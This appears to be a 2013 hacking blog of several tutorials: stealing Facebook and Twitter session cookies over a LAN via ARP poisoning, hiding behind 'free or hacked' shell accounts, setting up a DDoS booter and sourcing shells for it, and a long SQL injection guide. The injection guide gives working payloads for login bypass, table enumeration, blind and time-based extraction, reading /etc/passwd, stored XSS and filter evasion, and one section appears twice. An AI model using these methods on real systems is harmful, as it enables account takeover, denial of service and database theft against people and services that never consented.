Sunday, 21 April 2013

Cookie Stealing Attack ?

In this tutorial i will explain how you can hack a Facebook/twitter accounts by stealing cookies. This method works only when the victims computer is in a LAN (local area network ).Best place to try out this is in schools ,collages ,cafes . where computers are connected in LAN .Before i proceed let me first explain cookies.

What Are Cookies ? And What Is The Use Of Stealing Cookies ?

Cookies are small files that stored on users computer by websites when a user visits them. The stored Cookies are used by the web server to identify and authenticate the user .For example when a user logins in Facebook a unique string is generated and one copy of it is saved on the server and other is saved on the users browser as Cookies. Both are matched every time the user does any thing in his account

So if we steal the victims cookie and inject them in our browser we will be able to imitate the victims identity to the web server and thus we will be able to login is his account . This is called as Side jacking .The best thing about this is that we need not no the victims id or password all we need is the victims cookie.

Hack Facebook / Twitter By Stealing Cookies ?

1. Ettercap or Cain and able for ARP poisoning the victim
2. Wire shark for sniffing and stealing cookies
3. Firefox browser and Cookie logger add on for injecting the stolen cookies in our browser

1. First ARP poison the victim .For this you can refer my previous articles on how to ARP poison the victims computer using Cain and able or Ettercap

2. After ARP poisoning open Wire shark ,click capture button from the menu bar , then select interface .Now select your interface (usually eth0 ) finally click start capture .

3. Now you can see the packets being captured , wait for a while till the victim logs in his account( Facebook /twitter ),

4. Mean while Find the IP address of Facebook ,for this you can open CMD (command prompt ) and enter .Ping Facebook.com to find its IP address.

5. Now filter the packets by entering the the IP address (Facebook) in the filter bar and click apply

6. Now Locate HTTP Get /home.php  and copy all the cookie names and values in a notepad.
7. Now open Firefox and open add and edit cookies ,which we downloaded earlier , add all the cookie values and save them.
 8. Now open Facebook in a new tab , you will be logged in the victims account .


Ra Du ......you have hacked the victims Facebook account by stealing cookies , You can also follow the same steps to hack  Twitter accounts


Hope you enjoyed this tutorial , If you have any doubts please feel  free to post a comment.

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.  

Saturday, 20 April 2013

Be anonymous on Internet !

Being Anonymous


I'll show you how to be annonymous !

All you actions will be 100% <Aprox.>annonymous ( browsing websites, msn, yahoo, IRC, etc... )

<<<>>>What Is needed ?

a. putty ( http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html )

b. Proxifier ( you can download it here : http://www.4shared.com/file/vjvW9V26/PRO...RGOUS.html )

c. Shell account -free or hacked- ( http://www.cjb.net/ )

d. A Brain ........

First ----- register a free shell account ! in... cjb.net

Download and install the Proxifier !

First... need to do is SSH Tunneling....
1.Download putty install and start.

<http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html>

2. Now input your host name :
Here,

Hostname: shell.cjb.net
--------------------------------------------------------
now,

Go to -->"SSH",

then select ----> "tunnels", <here put ---> sorce port : 2121>

then tick the ----> "dynamic" radio button,..(though you can put any source port number on the box as per your requirement ) and

click ----->"add" Now go to ----->"Session" and then put a session name at "Saved Session" -- then click-->"Save"

Done ...3. Now open (Double click on the saved session)The Putty login screen will appear....Then -------------------------

Login: username (the username of shell.cjb.net that you have registered earlier)Password: Put the password (you have given when it is registered or follow ur email)

now[ENTER]

SSH TUNNELING IS DONE ____________________________________________________________________4.CONFIGURIN ​G PROXIFIERNOW open ---------> Proxifiergo to -----> Options -----> Proxy Settings [ Here 'Remove' the existing one...Then click "ADD" ] [ Proxy server (Pop up) : server: 127.0.0.1 Port: 2121 Protocol: SOCKS version5]

PRESS OK-----> OK

___________________________________________________________

5. CHECK YOUR IP ADDRESS(http://www.whois.is)___________________________________________________________6. Restart Your MSN, SKY PEE etc.... all will run through it..

6. Now browse with (Tor)
And

7. Vertually chenge your mac address with TMAC.

Thats all It is Done Now U are approx 100% Anonymous over the internet.
If U Like I Plz Say Thanx and if possible then (+rep) Plz.



This tutorial has been written By Ra Du and is NOT for public distribution.All information in this tutorial is for educational purposes only. Any illegal activity relating to this tutorial is not my responsibility, although I would like to say I don't care how you use it, I do. So please do not use this for Black-hat activities. One day when you grow up you might realise that you have been a skid, by using mass-deface techniques and SQLi for your entire life. Do not just hack a site because it is there. I have a few sites of my own and its annoying, unproductive, and pointless.

Friday, 19 April 2013

How to Start Your Own Stresser/Booter

[Image: ieq6viOQ6szdE.gif]

[Image: jIkTP3jGqIFME.png]

This tutorial will teach you how to maintain and create your own stresser, otherwise known as a booter. I have another tutorial on this. This tutorial is updated, more detailed, and gives an even better source. Please leave feedback, or questions, or even if you think I should add something in, please don't hesitate.

[Image: jW2mxjejiQxR6.png]

1. Introduction (Sector 1)
2. Uploading Your Files (Sector 1)
3. Uploading and Configuring MySQL Databases (Sector 1)
4. Mandatory File Edits (Sector 1)
5. Configuring PhpMyAdmin (Sector 2)
6. Accounts (Sector 3)
7. Creating An Account (Sector 3)
8. Activating Your Account and Making Yourself an Administrator (Sector 3
9. Accessing the Administrator Control Panel (Sector 3)
10. Sells/APi's (Sector 4)


[Image: j3Kqy0dUN0MNg.png]

So. You may be this far, but you may not know what a stresser, or "booter" even is. A stresser uses shells or api's to attack a certain location. These will send a certain amount of packets to the desired location, and if it sends enough packets it will force the server, or connection to flood, and simply crash. When a router, or connection/network crashes, that server cannot handle the amount of incoming packets.

[Image: jLVyWBEP1gdZK.png]

JeeJee Power v1.0 Source:

Click Me

Shell Checker:

Click Me

Introduction (Sector 1):

Welcome to Sector One of this tutorial. In this stage I will be teaching you the following:
  • How to setup your hosting.
  • How to upload and configure your stresser.

Uploading Your Files (Sector 1):

1. For tutorial purposes I'm simply going to use a hosting website called http://000webhosting.com/ I would not advise using this website, you will not be able to send attacks. They have fsock disabled. As I said, this site is just for tutorial purposes. I would advise getting cheap hosting here at HackForums in the hosting marketplace.

Once you have your hosting, you will want to upload your files that you originally downloaded above. ONLY upload the files within the source folder included in the download. There is no point uploading the banner .PSD etc.

To upload your files download filezilla at http://www.filezilla-project.org/ or use the file manager in your hosting's cPanel.

Uploading and Configuring MySQL Databases (Sector 1):

Once you have your files uploaded. Go into your cPanel and create a MySQL database.

The majority of hosts, if not all will all come with MySQL installed.

Create your database. Remember the information used.

After your database has been created, we now want to edit three files. The three files are below:

Mandatory File Edits (Sector 1):

We need to edit the files so our stresser can connect to the MySQL Database.
  • dbc.php
  • shellcounter.php
  • includes/ezSQL.php ( line 44, 71 and 101 )

dbc.php:

This is self explanatory. At the top you will see the lines below. The lines below explain exactly what to edit. Edit the information within the ' 's. Like I have done below.

PHP Code:
define ("DB_HOST", "mysql9.000webhost.com"); // set database host
define ("DB_USER", "a9162705_xx"); // set database user
define ("DB_PASS","Example1"); // set database password
define ("DB_NAME","a9162705_xx"); // set database name
Line 1: This is your database host.
Line 2: This is your database username.
Line 3: This is your database password.
Line 4: This is your database name.

If you haven't caught on by now. You need to input all of your MySQL information into those fields.

shellcounter.php:

The top of shellcounter.php will look like this:

PHP Code:
/* START OF CONFIGURATION SECTION */
$mysql_username = 'a9162705_xx'; // MySQL User Name
$mysql_password = 'Example1'; // MySQL Password
$mysql_hostname = 'mysql9.000webhost.com'; // MySQL Host Name
$mysql_hostport = 3306; // MySQL Host Port
$mysql_database = 'a9162705_xx'; // MySQL Database
$mysql_shelltbl = 'shellpool'; // MySQL Table Name (will be created if it does not exist)
$mysql_stengine = 'MyISAM'; // Preferred MySQL Storage Engine (MyISAM, MRG_MyISAM or InnoDB)


You will only need to edit the following with your MySQL Database Information:

PHP Code:
$mysql_username = 'a9162705_xx'; // MySQL User Name
mysql_password = 'Example1'; // MySQL Password
$mysql_hostname = 'mysql9.000webhost.com'; // MySQL Host Name
$mysql_database = 'a9162705_xx'; // MySQL Database


LEAVE everything else as is. Ports for example, leave them. They're fine.

ezSQL.php:

I would recommend getting Notepad++. Download it at, http://notepad-plus-plus.org/ to navigate line numbers easier. Read above for the lines that need to be edited.

Line 44:

Edit the obvious fields. I've inputted my database information.

PHP Code:
function ezSQL_mysql($dbuser='a9162705_xx', $dbpassword='Example1', $dbname='a9162705_xx', $dbhost='mysql9.000webhost.com')

Line 71:

Once again, edit the obvious fields. Look at the $values. It explains it clearly. $dbuser is the database username, and so on. Common sense.

PHP Code:
        function connect($dbuser='a9162705_xx', $dbpassword='Example1', $dbhost='mysql9.000webhost.com')

Line 101:

Finally for a short one, line 101, just the database name.

PHP Code:
function select($dbname='a9162705_xx')

Configuring PhpMyAdmin (Sector 2):

Welcome to Sector 2 of this tutorial. This will teach you how to configure your PhpMyAdmin with your stresser source. Please don't over think this. It may seem overwhelming, but it's incredibly simple.

Your cPanel should have PhpMyAdmin.

Locate the import button located at the top of PhpMyAdmin:

[Image: ibnSppRtGxLUlX.png]

Once you're in the import menu. Upload the provided .SQL file in the JeeJee Power folder. Like below:
[Image: ibzIoagF1p74n6.png]

Then after click "Go" like provided below.

[Image: iRWQMzyV6Y1I9.png]

Then you should get a success message, and the databases should appear on the side.

[Image: ibnSppRtGxLUlX.png]

Accounts (Sector 3):

Welcome to Sector 3 of this tutorial! In this sector we will be learning how to register our account, activate it, and then proceed to give our self administrator rights, and access to the AdminCP.

You will want to locate YOURDOMAIN.com/login.php (Of course replace YOURDOMAIN with your actual domain, as this is just an example).

Creating An Account (Sector 3):

You will now be at the login page like below. (IF you get a MySQL error, you have input your MySQL details to the edited pages incorrectly).

[Image: ifPxE7PWOumN4.png]

Click the register button, and register your account.

[Image: i7W9kRZto6bPu.png]

Now your account is registered! Congratulations.

We're not done yet!

[Image: iCub0oXuOHsKI.png]

Activating Your Account and Making Yourself an Administrator (Sector 3):

Now go back to PhpMyAdmin.

Click the table called 'Users' on the side and then click Browse button at the top, just like when you clicked import.
[Image: itDujnSFYjH1c.png]

You should see your own profile:

[Image: 1VKOC]

You want to click edit, which is of course the little pencil button.

You need to change the values. Change the user_level value to 5. This will make an you administrator. Then you want to change the approved value from 0 to 1 to approve your account.

Congratulations, your account is now active, and you're an administrator!

[Image: iYeDbww90WtHe.png]

Accessing the Administrator Control Panel (Sector 3):

To go to the administrator's control panel go to YOURDOMAIN.com/admin.php (Obviously replace YOURDOMAIN.com with your own once again).

From here you can change your booters name, add shells, post new bulletins, read logs, create users, active users and more!

Shells/APi's (Sector 4):

Ok. So you're finished, you want to get going right? Right. Unfortunately, this is the hard part. Well, easy but then again frustrating and can be time consuming.

You need shells or APi's for your booter/stresser to work. Here are your options:
  • Buy shells from people in the HF marketplace.
  • Get your own from pastebin and use a shell checker provided in the downloads.
  • Request free shells, or look for giveaways on HF.

    Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

SQLi Advanced

Introduction:

For the purposes of this guide, we are going to create a classic ASP login system using a MSSQL database. We’ll be going through the vulnerabilities as well as how to fix them.

Credits:

Credits for this guide goes to: Anonymous, ShadowCloud and bugga.


Part 1 - The Setup:

To get started, we’ve created the following page which uses classic ASP.

Code:
<%@ Language = "VBScript" %>
    <%
    Option Explicit
    Dim cnnLogin, rstLogin, strUsername, strPassword, strSQL
    Const adCmdText = 1 'Evaluate as a textual definition
    Const adCmdStoredProc = 4 'Evaluate as a stored procedure
    %>
    <html>
    <head><title>Login Page</title>
    </head>
    <body bgcolor="gray">
    <%
    If Request.Form("action") <> "validate_login" Then
    %>
    <form action="default.asp" method="post">
    <input type="hidden" name="action" value="validate_login" />
    <table border="0">
    <tr>
    <td align="right">Login:</td>
    <td><input type="text" name="username" /></td>
    </tr>
    <tr>
    <td align="right">Password:</td>
    <td><input type="password" name="password" /></td>
    </tr>
    <tr>
    <td align="right"></td>
    <td><input type="submit" VALUE="Login" /></td>
    </tr>
    </table>
    </form>
    <%
    Else
    Set cnnLogin = Server.CreateObject("ADODB.Connection")
    cnnLogin.open "PROVIDER=SQLOLEDB;DATA SOURCE=.\SQL2008;UID=HF;PWD=password;DATABASE=HFSQLi"
    'Go to the database and check if we have such a user
    strSQL = "SELECT * FROM tblusers WHERE username='" & Request.Form("username")& "' AND password='"_
    & Request.Form("password") & "';"
    Set rstLogin = cnnLogin.Execute(strSQL)
    'This is where we check whether the login was succesfull
    If Not rstLogin.EOF Then
    %>
    <p>
    <strong>Logged In!</strong>
    </p>
    <%
    Else
    %>
    <p>
    <font size="4" face="arial,helvetica"><strong>Login Failed!</strong></font>
    </p>
    <p>
    <a href="default.asp">Try Again</a>
    </p>
    <%
    'Response.End
    End If
    Response.Write "<hr>"
    Response.Write "<p><i>The query ended up as: </i>"
    Response.Write strSQL
    Response.Write "</p>"
    ' Clean Up
    rstLogin.Close
    Set rstLogin = Nothing
    cnnLogin.Close
    Set cnnLogin = Nothing
    End If
    %>


Along with a SQL database named HFSQLi which has the following table.

[Image: pro1-1.jpg]

The SQL script to create this table is included below, you can just add you own data to it.

Code:
/* To prevent any potential data loss issues, you should review this script in detail before running it outside the context of the database designer.*/
    BEGIN TRANSACTION
    SET QUOTED_IDENTIFIER ON
    SET ARITHABORT ON
    SET NUMERIC_ROUNDABORT OFF
    SET CONCAT_NULL_YIELDS_NULL ON
    SET ANSI_NULLS ON
    SET ANSI_PADDING ON
    SET ANSI_WARNINGS ON
    COMMIT
    BEGIN TRANSACTION
    GO
    CREATE TABLE dbo.tblUsers
    (
    ID int NOT NULL IDENTITY (1, 1),
    UserName nvarchar(50) NULL,
    Password nvarchar(50) NULL,
    LastLoginDate datetime NULL
    ) ON [PRIMARY]
    GO
    ALTER TABLE dbo.tblUsers ADD CONSTRAINT
    PK_tblUsers PRIMARY KEY CLUSTERED
    (
    ID
    ) WITH( STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
    GO
    ALTER TABLE dbo.tblUsers SET (LOCK_ESCALATION = TABLE)
    GO
    COMMIT
PART 2 – Understanding a SQL query:

To get to grips with what a SQL query is, we’ll use the table we created above, if you have a copy of SQL you can set this up on your own computer to get a better understanding of SQLi, you can pick up a free copy of SQL server 2008 Express from the Microsoft website. A SQL SELECT query generally consists of three parts: SELECT - which specifies the data from the table to return FROM - the table you wish to return results from WHERE - the conditions which must be met before the data is returned

Keeping this in mind, we can write the following SELECT query based on the data we have in the table as indicated below:

[Image: pro2.png]

SELECT Password
FROM tblusers
WHERE Username = ‘bugga’
Which will bring back bugga’s password:



The other entries are ignored because the UserName was not equal to the value in our WHERE clause.
You can also specify multiple WHERE clauses and even return more than one column like so:
SELECT Username, Password FROM tblusers WHERE Username = ‘ShadowCloud’ OR Username = ‘Anonymous’



The above illustrates the basics of a SQL query, the term SQL injection, refers injecting values which are used by a SQL query so the values returned were not the values the application intended to return, a good example would be the following.

SELECT Username, Password
FROM tblusers WHERE username = ‘TheValueTheUserEntered’
Instead of entering a value like admin, we enter a’OR 1= 1—

This effectively changes the SQL query to the following:

SELECT Username, Password
FROM tblusers
WHERE username = 'a'OR 1=1--'

SQL will check the table for a value and ask itself 2 questions to confirm whether the results should be returned, the first question being “Is the username for this row equal to a” for which it would of course answer with No, it isn’t BUT, because we have the OR part in our value, there is a second question, “Is 1 equal to 1” and since 1 is always equal to 1, all the rows are returned, as indicated below:

[Image: pro5-1.png]

PART 3 -- Understanding SQLi:
I’ve added some code to display the results just so there’s some more clarity on what’s going on during the login process, the interesting piece of code which is vulnerable to SQLi in this example is the following:

Code:

strSQL = "SELECT * FROM tblusers WHERE username='" & Request.Form("username")& "' AND password='"_
& Request.Form("password") & "';"
A SQL command is being built up using the values we entered into the login form. If for instance we enter the username admin and the password SuperSecurePassword then the following SQL Query is built up:

SELECT * FROM tblusers WHERE username='admin' AND
password='SuperSecurePassword';
If we actually run that query directly in SQL then we get the following result:

[Image: pro6.png]

If however, we enter credentials that are not in the table, like username admin with password as just password the following SQL query is built up.

SELECT * FROM tblusers WHERE username='admin' AND password='password';
And if that is ran in SQL we receive the following:

[Image: pro9.png]

As you can see, there are no results.
In the event that no results are returned, we are not logged in, if the query finds results, then we’ll be logged in successfully. At the moment, this might appear to be a perfectly valid login system, if the wrong details are entered; invalid login is displayed, if the user details are correct, he sees the Logged In! message.

Clearly this developer was either extremely lazy, or has never heard of SQL injection before, as a simple test we add a single quote to the username:

[Image: pro8.png]

Immediately we can see that this produced some unwanted results, taking a closer look at how the SQL query is being built up, we can see the following SQL query would have been produced:

SELECT * FROM tblusers WHERE username=''' AND password='a';

Running that same query in SQL management studio, we see the following result:

[Image: pro7.png]

Here you can clearly see what happened, the extra single quote escaped the value and any text we add will now be added to the query, so comment out the rest of a line in SQL, we use the “--“ so let’s go ahead and add that so the query results in:

SELECT * FROM tblusers WHERE username=''--' AND password='aa';

If we give that to management studio, we are presented with the following:

[Image: pro10.png]

This time round, there is no error at all since we have uncommented the part of the query that would have resulted in the error we saw earlier, so now the we know we only need a username to login and not a username and password anymore, let’s try to login with “admin’--“ and see the results:

[Image: pro11.png]

Magic, we are now logged in, since the database only confirmed the existence of a user named admin, we are automatically logged in. The part of the query that confirmed that we entered the correct password has been commented out and no longer applies.

Part 2 – Getting more information:

So now that we know we can log in, what other details can we obtain from this little vulnerability? So we try to get a list of all the tables in the database using:
admin' UNION ALL SELECT name from sysobjects where type = 'u'--

But instead of table names, we get an error:

[Image: pro12.png]

This is an error most of you will/have see(n) frequently. When you use UNION in your injection, the items you select from the database in the second part of the query (the union) must be the same amount of items that the first query select. In this case the first query selects *, this means that all columns in the table are returned.

We now, since we’ve already seen the table, that there are 4 columns in this table as indicated again below:

[Image: pro13.png]

When you are busy injecting a site and you don’t know how many columns there are to select from, just keep adding null to the query like this:

2 columns
admin' UNION ALL SELECT name,null from sysobjects where type = 'u'--
3 columns
admin' UNION ALL SELECT name,null,null from sysobjects where type = 'u'--
4 columns

Aha! We are logged in, now we know that there are 4 columns in the first SELECT statement.

But, we were still logged in, without getting any extra information, apart from knowing the table has 4 columns (without having to look at the table).

So let’s just the query from a user that exists, admin, to a value that doesn’t exist, like “unknown” We should end up with the following input
1' UNION ALL SELECT name,null,null,null from sysobjects where type = 'u'--' AND password='asd';

And there we have it, a new error, showing us exactly what we wanted to see:

[Image: pro14.png]

Now we know the name of the login table. We know the login table has 4 columns.
Side note: If the first column in the table was of type nvarchar, we would not get this conversion error, only the login failed message, since most table names are exactly that, actual names not just numbers, you can force this error message by doing the following:

1' UNION ALL SELECT null,CAST(name AS INT),null,null from sysobjects where type = 'u'--' AND password='asd';

[Image: pro15.png]

In this case, SQL would be sent the following command:

SELECT * FROM tblusers WHERE username='1'
UNION ALL SELECT null, CAST (name AS INT),null,null from sysobjects where type = 'u'
--' AND password='asd';' AND password='sdf';

Since we are casting the name as an integer value, but we don’t have a number, the error will be displayed. So great, we now know that tblusers exists in the database, but what the other tables? We change the query to the following:

1' UNION ALL SELECT null,CAST(name AS INT),null,null from sysobjects where type = 'u' AND name not like 'tblusers'--

The SQL command would then be:

SELECT * FROM tblusers WHERE username='1'
UNION ALL SELECT null, CAST(name AS INT),null,null from sysobjects where type = 'u' AND name not like 'tblusers'--

And voila, we receive the following error:

[Image: pro16.png]

To get the columns from here, we are going to need to obtain the ID for the table from sysobjects. So we try the following:

1' UNION ALL SELECT (id),name,id,id from sysobjects where xtype = 'u'—

And receive the following error:

[Image: pro17.png]

This shows us that the query did bring back a value but since there is a conversion error, we don’t know what the value was, so we need to start guessing the value as follow:

1' UNION ALL SELECT (id),name,id,null from sysobjects where xtype = 'u'
AND ID < 100

If a value is brought back (there are tables with an ID smaller than 100) then we can start getting more specific, if not we keep searching until we can emulate the IDs we do have in the database. The first time I hit the error I have the value as

SELECT * FROM tblusers WHERE username='1'

UNION ALL SELECT (id),name,id,null from sysobjects where xtype = 'u'

AND ID < 10000000000

So now I know the correct ID for the table is somewhere between 10000000000 and 1000000000

That’s still a pretty big range, but the very next query tears up half the results and before you know it, I have 2 valid IDs.

1' UNION ALL SELECT (id),name,id,null from sysobjects where xtype = 'u'
AND ID = 2105058535
As well as the following query:

1'
UNION ALL SELECT (id),name,id,null from sysobjects where xtype = 'u'
AND ID = 2137058649

Both produce an error, telling us that the tables with those IDs does exist in the database.

Now we can start pulling the column names from them:

1'
UNION ALL SELECT COL_NAME(2137058649, 1),2,3,4 FROM tblusers

This will give us the first column name from the table with ID 2137058649
We can repeat the process with:

COL_NAME(2137058649, 2)
COL_NAME(2137058649, 3)
COL_NAME(2137058649, 4)

To get the other column names. This process can be repeated for any table in the database to return a full structure.

The following query shows me the column name from a table called SomeOtherTable
1' UNION ALL SELECT COL_NAME(2137058649, 4),2,3,4 FROM tblusers--' AND password='a'

[Image: pro18.png]

This should enable you to obtain the database structure, the tables and the columns along with the data contained in those tables and columns.

PART 4 – Moving along 
The previous injection was a string based SQL injection, that’s why we needed to add the single quote to “escape” from the query and write our own SQL. In the next part of this tutorial we will take a look at int based SQL injection, where we do not need to escape the value.

As a practical example I have created the following page which takes an ID (a number) and returns the corresponding record from SomeOtherTable in the database, here is the table itself:

[Image: Pt41.png]

The page is presented to the user as:

[Image: pt42.png]

If you enter an ID, the corresponding record is returned from the database, so if we enter 1 as the lookup ID, we receive the following:

[Image: pt3.png]
PART 4 – Moving along

The previous injection was a string based SQL injection, that’s why we needed to add the single quote to “escape” from the query and write our own SQL. In the next part of this tutorial we will take a look at int based SQL injection, where we do not need to escape the value.

As a practical example I have created the following page which takes an ID (a number) and returns the corresponding record from SomeOtherTable in the database, here is the table itself:

[Image: Pt41.png]

The page is presented to the user as:

[Image: pt42.png]

If you enter an ID, the corresponding record is returned from the database, so if we enter 1 as the lookup ID, we receive the following:

[Image: pt3.png]

In this example the query that is built up is:

SELECT * FROM SomeOtherTable WHERE id= 1

This should give us a good indication of what we need to mess around with it. In this example, we don’t need to escape by inserting a ‘ we can simply continue the query, or write a second query by terminating the first statement.

We could do enter 1 OR ID = 2 (Remember we got the column names in the previous example ?)

Which would mean the query is modified to :

SELECT * FROM SomeOtherTable WHERE id= 1 OR ID = 2

And produce the following results:

[Image: F1.png]

We could become inventive though, and terminate the first follow and follow it up with our own second query;
Like so

1; INSERT INTO SomeOtherTable (ContentString, Template, Title) VALUES ('MyValue','1','Injected')

The ; terminates the first statement and after that we create our own statement to insert new values into the database table.

If we select to lookup the values where the ID is 5, we are presented with the following:

[Image: f2.png]

Bingo, we are able to write data into this table and have it displayed, immediately you can think about doing a persistent XSS like this:

1; INSERT INTO SomeOtherTable (ContentString, Template, Title) VALUES ('MyValue','1','Injected<script>alert("TEST")</script>')

And if we do a lookup on value number 6, bingo:

[Image: f3.png]

Now we know the application is vulnerable to SQL injection and we also have a XSS vulnerability. With a bit of creativity you can create some really interesting attacks from here.

PART 5 - Friendly Error pages and Blind SQL injection

So far we’ve been able to deduce a lot because we received the actual error messages from SQL. One method which is more and more commonly being used to prevent the details of an error of being sent to the attacker is friendly error pages. You can configure friendly error pages instead of detailed error pages:

Here is an example of friendly error pages on this same site:

[Image: f4.png]

So this time round, if we produce an error, we do not receive any details about the error. This does not mean we cannot inject values, as an example with this setting enabled I’ll inject values into the SomeOtherTable as follow:

1; INSERT INTO SomeOtherTable (ContentString, Template, Title) VALUES ('WithFriendlyErrorPages','1','It still does not block an attack')

As you can see, the injection still worked, because we didn’t generate an error, the friendly error pages had no effect at all.

[Image: f5.png]

The main problem with friendly error pages are enabled, is that we no longer get the feedback we received earlier, so something like

'1' UNION ALL SELECT null,CAST(name AS INT ),null,null from sysobjects where type = 'u'

Which we used successfully on the login page earlier to see a table name, now produces this:

[Image: f6.png]

To circumvent this, we need to find a way to check if our queries do bring back a value we can either employ time based queries, or simply run queries until no error is returned, consider the following

1' UNION ALL SELECT null,CAST(name AS INT),null,null from sysobjects where type = 'u' AND name = 'NoSuchTable'--

Because there is no such table in the database, no conversion fails and no error is generated, which means we see the good old “Login Failed” page. This tells us that there really isn’t a table called NoSuchTable, the opposite is also true, if that query is changed to

1' UNION ALL SELECT null,CAST(name AS INT),null,null from sysobjects where type = 'u' AND name = '‘tblusers’'--

We receive an error, caused by the conversion failure for the name as int (Remember we are trying to CAST the name as a number, which causes the error).
Alternatively consider the following:

1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1
and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)

Here we add a AND clause to the WHERE so unless the ASCII value of the first letter of the first user in the sysusers table is smaller than 300, no results are returned.

The first time we run this query results are returned, we then lower the value to 200, still some results, so we go to 100 and there are still results:

[Image: f7.png]

So we drop the value to 10:

1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1
and 10>(select top 1 ascii(substring(name,1,1)) from sysusers)

This time, there are no results:

[Image: f8.png]

Eventually after much tampering I can see the value is below or equal to 100 but not above 90

1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1
and 90<(select top 1 ascii(substring(name,1,1)) from sysusers)

[Image: f9.png]

This clearly shows us that the first letter of the username is 1
Moving on from enumerating the responses and calculating the values accordingly, you can also use time based queries, consider the following:

1 waitfor delay '0:0:19'--

In the event that no error is produced, the query will wait 19 seconds before returning a result, I’ve included a screenshot of the time this took in SQL server management studio below:

[Image: f10.png]

As you can see, the query waited for 19 seconds before finishing, during this time you’ll see the following in your browser:

[Image: f11.png]

We can extend this to something like

1 if (select user) = 'sa' waitfor delay '0:0:19'--

If the current user is the sa user, the page will wait 19 seconds before showing any results. This will give a clear indication of values in the database, without relying on error messages.

PART 6 - Database specific commands

So far we’ve mostly covered MSSQL, so here are a couple of other commands you might find helpful when dealing with MySQL rather than MSSQL.

Version:

SELECT @@version

Comments:

SELECT 1; #comment

SELECT /*comment*/1;

Current User:

SELECT user();

SELECT system_user();

List Users:

SELECT user FROM mysql.user; — priv

List Password Hashes:

SELECT host, user, password FROM mysql.user; — priv

Password Cracker:

John the Ripper will crack MySQL password hashes.

List DBA Accounts:

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv


Current Database:

SELECT database()

List Databases:

SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0

SELECT distinct(db) FROM mysql.db — priv
List Columns:

SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’

List Tables:

SELECT table_schema,table_name FROM information_schema.tables
WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’

Find Tables From Column Name:

SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — find table which have a column called ‘username’

Select Nth Row:

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0

Select Nth Char:

SELECT substr(‘abcd’, 3, 1); # returns c

Bitwise AND :

SELECT 6 & 2; # returns 2

SELECT 6 & 1; # returns 0

ASCII Value -> Char:

SELECT char(65); # returns A

Char -> ASCII Value:

SELECT ascii(‘A’); # returns 65

Casting:

SELECT cast(’1' AS unsigned integer);

SELECT cast(’123' AS char);

String Concatenation:

SELECT CONCAT(‘A’,'B’); #returns AB

SELECT CONCAT(‘A’,'B’,'C’); # returns ABC

If Statement:

SELECT if(1=1,’foo’,'bar’); — returns ‘foo’

Case Statement:

SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A

Avoiding Quotes:

SELECT 0×414243; # returns ABC

Time Delay:

SELECT BENCHMARK(1000000,MD5(‘A’));

SELECT SLEEP(5); # >= 5.0.12

Command Execution:

If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform.

Local File Access:

UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files.

SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system

Hostname, IP Address:

SELECT @@hostname;

Create Users:

CREATE USER test1 IDENTIFIED BY ‘pass1'; — priv

Delete Users:

DROP USER test1; — priv

Make User DBA:
GRANT ALL PRIVILEGES ON *.* TO test1@’%'; — priv

Location of DB files:

SELECT @@datadir;

Default/System Databases:

information_schema (>= mysql 5.0)
Part 7 – WAF

WAF stands for Web Application Firewall or Web Application Filtering in some circles. It refers to the filtering of input on either a blacklist or whitelist approach. The concept of WAF came from IPS systems which focused on the HTTP Protocol. In most cases WAF employs complex regular expression to validate the input against a rule list.

In a whitelist approach, all data that does not much the filters in the list are blocked. If a user enters a value not contained within the rule list, the query is blocked. A much more common implementation in practice is the blacklist approach. When the blacklist approach is used, a rule list is set up and any data that matches the rules are blocked. Although a whitelist approach is much more secure, it can negatively impact user experience.

Here’s a list of commonly used filters as well as the methods employed to bypass these filters:

Filters||Evasion

'or 1=1-- || 'or 2=2--
alert(0) || alert(0)
<script>alert(0)</script> || <script type=vbscript>MsgBox(0)</script>
' or ''''='r || '/**/OR/**/''''='
<img src=x:x onerror=alert(0)//></img> || <img src=”x:x” onerror=”alert(0)”></img>
1 or 1=1 || (1)or(1)=(1)
eval(name) || x=this.name X(0?$:name+1)


What’s important to take into consideration with WAF is that it increases the attack surface of the application. There have been multiple accounts of WAF being vulnerable to XSS, SQLi and even being used as an attack vector for DDOS as well as remote code execution.

If you’re ever faced with a WAF to bypass here’s a common methodology you can follow to get past it:

1.Find out which characters / sequences are allowed by WAFs.

